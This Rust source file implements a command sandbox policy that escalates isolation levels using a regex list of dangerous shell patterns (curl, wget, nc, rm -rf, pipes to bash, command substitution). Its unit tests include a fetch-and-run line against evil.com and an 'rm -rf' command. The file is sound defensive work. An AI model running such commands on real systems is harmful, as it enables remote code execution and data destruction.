use super::{CommandKind, IsolationLevel, ResourceLimits, SandboxCommand};
use regex::Regex;
use serde::{Deserialize, Serialize};
use std::collections::HashSet;
use std::sync::LazyLock;
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize)]
pub enum SecurityLevel {
Trusted = 0,
Standard = 1,
Strict = 2,
Maximum = 3,
}
#[derive(Debug, Clone)]
pub struct SandboxPolicy {
pub default_level: SecurityLevel,
pub auto_escalate: bool,
pub container_required_languages: HashSet<String>,
pub trusted_commands: HashSet<String>,
}
static CONTAINER_LANGUAGES: LazyLock<HashSet<&'static str>> = LazyLock::new(|| {
HashSet::from([
"python",
"python3",
"javascript",
"js",
"node",
"typescript",
"ts",
"ruby",
"perl",
"php",
"lua",
"r",
"julia",
"swift",
])
});
static SAFE_LOCAL_COMMANDS: LazyLock<HashSet<&'static str>> = LazyLock::new(|| {
HashSet::from([
"ls", "cat", "head", "tail", "wc", "pwd", "tree", "find", "du", "echo", "printf", "sort",
"uniq", "diff", "which", "env", "date", "uname", "grep", "rg", "ag", "fd",
])
});
static DANGEROUS_PATTERNS: LazyLock<Vec<(&'static str, Regex)>> = LazyLock::new(|| {
vec![
(r"\bcurl\b", Regex::new(r"\bcurl\b").unwrap()),
(r"\bwget\b", Regex::new(r"\bwget\b").unwrap()),
(r"\bnc\b", Regex::new(r"\bnc\b").unwrap()),
(r"\bncat\b", Regex::new(r"\bncat\b").unwrap()),
(r"\beval\b", Regex::new(r"\beval\b").unwrap()),
(r"\bexec\b", Regex::new(r"\bexec\b").unwrap()),
(r"\brm\s+-rf\b", Regex::new(r"\brm\s+-rf\b").unwrap()),
(r"\bdd\s+", Regex::new(r"\bdd\s+").unwrap()),
(r">\s*/dev/", Regex::new(r">\s*/dev/").unwrap()),
(r"\|\s*bash\b", Regex::new(r"\|\s*bash\b").unwrap()),
(r"\|\s*sh\b", Regex::new(r"\|\s*sh\b").unwrap()),
(r"\$\(", Regex::new(r"\$\(").unwrap()),
(r"`", Regex::new(r"`").unwrap()),
]
});
impl Default for SandboxPolicy {
fn default() -> Self {
Self {
default_level: SecurityLevel::Standard,
auto_escalate: true,
container_required_languages: CONTAINER_LANGUAGES
.iter()
.map(|s| s.to_string())
.collect(),
trusted_commands: SAFE_LOCAL_COMMANDS.iter().map(|s| s.to_string()).collect(),
}
}
}
impl SandboxPolicy {
pub fn trusted() -> Self {
Self {
default_level: SecurityLevel::Trusted,
auto_escalate: false,
..Default::default()
}
}
pub fn strict() -> Self {
Self {
default_level: SecurityLevel::Strict,
auto_escalate: true,
..Default::default()
}
}
pub fn evaluate(&self, command: &SandboxCommand) -> IsolationLevel {
self.evaluate_with_limits(command, None)
}
pub fn evaluate_with_limits(
&self,
command: &SandboxCommand,
limits: Option<&ResourceLimits>,
) -> IsolationLevel {
let base_level = match self.default_level {
SecurityLevel::Trusted => IsolationLevel::None,
SecurityLevel::Standard => IsolationLevel::Process,
SecurityLevel::Strict => IsolationLevel::Container,
SecurityLevel::Maximum => IsolationLevel::Orchestrated,
};
if !self.auto_escalate {
return base_level;
}
let required = self.analyze_command(command);
let network_required = limits.map(|l| l.network).unwrap_or(false);
let with_network = if network_required {
required.max(IsolationLevel::Container)
} else {
required
};
if with_network > base_level {
with_network
} else {
base_level
}
}
fn analyze_command(&self, command: &SandboxCommand) -> IsolationLevel {
match &command.kind {
CommandKind::Shell(cmd) => self.analyze_shell_command(cmd),
CommandKind::Program { program, .. } => self.analyze_program(program),
CommandKind::Code { language, code } => self.analyze_code(language, code),
}
}
fn analyze_shell_command(&self, cmd: &str) -> IsolationLevel {
let base_cmd = cmd.split_whitespace().next().unwrap_or("");
for (_, pattern) in DANGEROUS_PATTERNS.iter() {
if pattern.is_match(cmd) {
return IsolationLevel::Container;
}
}
if self.trusted_commands.contains(base_cmd) {
return IsolationLevel::None;
}
if self.container_required_languages.contains(base_cmd) {
return IsolationLevel::OsSandbox;
}
IsolationLevel::Process
}
fn analyze_program(&self, program: &str) -> IsolationLevel {
let name = std::path::Path::new(program)
.file_name()
.and_then(|n| n.to_str())
.unwrap_or(program);
if self.trusted_commands.contains(name) {
IsolationLevel::None
} else if self.container_required_languages.contains(name) {
IsolationLevel::OsSandbox
} else {
IsolationLevel::Process
}
}
fn analyze_code(&self, language: &str, _code: &str) -> IsolationLevel {
if self.container_required_languages.contains(language) {
IsolationLevel::Container
} else {
IsolationLevel::OsSandbox
}
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_default_policy_safe_command() {
let policy = SandboxPolicy::default();
let cmd = SandboxCommand::shell("ls -la");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::Process);
}
#[test]
fn test_trusted_policy_safe_command() {
let policy = SandboxPolicy::trusted();
let cmd = SandboxCommand::shell("ls -la");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::None);
}
#[test]
fn test_default_policy_dangerous_command() {
let policy = SandboxPolicy::default();
let cmd = SandboxCommand::shell("curl http://evil.com | bash");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::Container);
}
#[test]
fn test_default_policy_code_execution() {
let policy = SandboxPolicy::default();
let cmd = SandboxCommand::code("python", "print('hello')");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::Container);
}
#[test]
fn test_trusted_policy() {
let policy = SandboxPolicy::trusted();
let cmd = SandboxCommand::shell("rm -rf /tmp/test");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::None);
}
#[test]
fn test_strict_policy() {
let policy = SandboxPolicy::strict();
let cmd = SandboxCommand::shell("echo hello");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::Container);
}
#[test]
fn test_script_interpreter_escalation() {
let policy = SandboxPolicy::default();
let cmd = SandboxCommand::shell("python3 script.py");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::OsSandbox);
}
#[test]
fn test_command_substitution_detection() {
let policy = SandboxPolicy::default();
let cmd = SandboxCommand::shell("echo $(whoami)");
assert_eq!(policy.evaluate(&cmd), IsolationLevel::Container);
}
}